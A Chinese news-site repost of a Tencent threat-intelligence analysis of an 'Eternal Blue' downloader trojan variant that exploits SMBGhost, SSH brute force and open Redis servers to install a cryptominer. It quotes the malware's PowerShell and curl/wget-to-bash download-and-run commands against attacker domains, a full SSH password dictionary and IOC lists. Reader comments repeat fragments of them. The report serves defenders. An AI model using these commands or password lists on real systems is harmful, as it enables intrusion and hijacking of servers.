当前位置:首页 > 网络黑客 > 正文内容

“黑球”行动再升级, *** BGhost 漏洞攻击进入实战

访客56年前 (1970-01-01)网络黑客840

感谢腾讯御见威胁情报中心来稿!

原文链接:https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA

一、概述

2020年6月10日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测 *** BGhost漏洞的基础上首次启用 *** BGhost漏洞攻击,之前的若干种病毒只是利用 *** BGhost漏洞做扫描检测,并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。

由于 *** BGhost漏洞CVE-2020-0796利用Windows *** B漏洞远程攻击获取系统更高权限,可直接攻击 *** B服务造成RCE(远程代码执行),存在漏洞的计算机只要联网就可能被黑客探测攻击,并获得系统更高权限。该攻击行动使得“永恒之蓝”系列木马针对Windows系统的攻击能力再次增强。

腾讯安全威胁情报中心曾多次发布 *** BGhost漏洞风险提示,至今仍有近三分之一的系统未修补该漏洞,我们再次强烈建议所有用户尽快修补 *** BGhost漏洞(CVE-2020-0796)。

此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,在失陷系统创建定时任务并植入挖矿木马功能,使得其攻击的范围继续扩大,包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马,并会按照惯例在开始挖矿前,清除其他挖矿木马,以便独占系统资源。挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。

二、样本分析

攻击模块if.bin在 *** bghost_exec函数中利用从hxxp://d.ackng.com/ *** gh.bin下载的 *** BGhost漏洞攻击程序发起攻击,攻击成功后远程执行以下shellcode:

powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/ *** gho.jsp?0.8*%computername%'')

针对Linux系统服务器的攻击

1、利用SSH爆破

扫描22端口进行探测,针对Linux系统root用户,尝试利用弱密码进行爆破连接,爆破使用密码字典:

saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dub *** ash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,” *** you”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,” “,”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta”

爆破登陆成功后执行远程命令:

`Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash`

2、利用Redis未授权访问漏洞

扫描6379端口进行探测,在函数redisexec中尝试连接未设置密码的redis服务器,访问成功后执行远程命令:

`export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash`

SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png,该脚本主要有以下功能:
a.创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp
b.创建crontab定时启动Linux平台挖矿木马/.Xll/xr


通过定时任务执行的a.asp首先会清除竞品挖矿木马:

然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP,重新与该机器建立连接进行内网扩散攻击:

创建目录/.Xll并下载挖矿木马(d[.]ackng.com/ln/xr.zip)到该目录下,解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。

永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态,目前该木马会通过以下 *** 进行扩散传播:

截止2020年6月12日,永恒之蓝木马下载器家族主要版本更新列表如下:

IOCs


Domain
t.amynx.com
t.zer9g.com
t.zz3r0.com
d.ackng.com

URL
http[:]//t.amynx.com/ *** gh.jsp
http[:]//t.amynx.com/a.jsp
http[:]//t.amynx.com/ln/a.asp
http[:]//t.amynx.com/ln/core.png
http[:]//d.ackng.com/if.bin
http[:]//d.ackng.com/ *** gh.bin
http[:]//d.ackng.com/ln/xr.zip

扫描二维码推送至手机访问。

版权声明:本文由黑客技术发布,如需转载请注明出处。

本文链接:https://w-123.com/32892.html

““黑球”行动再升级, *** BGhost 漏洞攻击进入实战” 的相关文章

数百个 GoDaddy 托管的网站,短时间内被部署了后门

Bleeping Computer 网站披露,网络安全分析师发现 GoDaddy 管理服务器上托管的部分 WordPress 网站,被部署了大量后门,所有网站都具有相同的后门有效载荷。 据悉,这次网络攻击可能影响到许多互联网服务经销商,已知的包括 MediaTemple、tsoHost、123Re...

Google Chrome 99.0.4844.84 紧急更新修复了已被利用的零日漏洞

Google已经为Windows、Mac和Linux用户发布了Chrome 99.0.4844.84,以解决一个在外部被利用的高严重性零日漏洞。浏览器供应商在周五发布的安全公告中说:”Google已经得知CVE-2022-1096的一个漏洞存在于外部。” 99.0.4844.84版本已经在稳定的桌...

Google 发布第 3 个紧急更新 修复 Chrome 中另一个零日漏洞

Google 今天发布了第 3 个紧急更新,修复了存在于 Chrome 浏览器中的另一个零日漏洞。周四,Google 面向 macOS、Windows 和 Linux 发布了 Chrome 100.0.4898.127 更新,会在未来几天内完成部署。 本次更新修复了追踪为 CVE-2022-1364...

以色列政府数个网站遭遇网络攻击:现正从瘫痪中恢复

以色列似乎正在从一场大规模的网络攻击中恢复过来。据Haaretz和Kan的Amichai Stein报道,攻击者在周一晚上攻陷了几个以色列政府网站,其中包括卫生部、内政部、司法部和福利部网站。总理办公室的网站也受到了影响。以色列国家网络管理局在一份声明中称,现在所有的网站都已重新上线。 虽然以色列政...

包含敏感数据数千个 Firefox cookie 出现在 GitHub 存储库中

包含敏感数据的数千个 Firefox cookie 数据库目前出现在 GitHub 的存储库中,这些数据可能用于劫持经过身份验证的会话。这些 cookies.sqlite 数据库通常位于 Firefox 配置文件文件夹中。它们用于在浏览会话之间存储 cookie。现在可以通过使用特定查询参数搜索 G...

FBI 发出警告:勒索软件集团正在利用财务信息进一步勒索受害者

FBI日前警告称,勒索软件集团正在瞄准涉及重大的、时间敏感的金融事件–如兼并和收购的公司,以此来胁迫受害者支付其赎金要求。FBI在本周写给私营公司的一份咨询中指出,网络犯罪分子在针对参与重大金融事件的公司时往往试图找到非公开信息,如果他们不支付赎金要求网络犯罪分子就会威胁公布这些信息。 “在最初的...

评论列表

鸠骨寻倌
2年前 (2022-08-02)

”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”123

瑰颈汐鸠
2年前 (2022-08-02)

23″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”

泪灼断渊
2年前 (2022-08-01)

设置密码的redis服务器,访问成功后执行远程命令:`export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso

可难戏侃
2年前 (2022-08-01)

”,”administrator”,”qwe1234A”,”qwe1234a”,” “,”123123123″,”1234567890″,”88888888″,

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。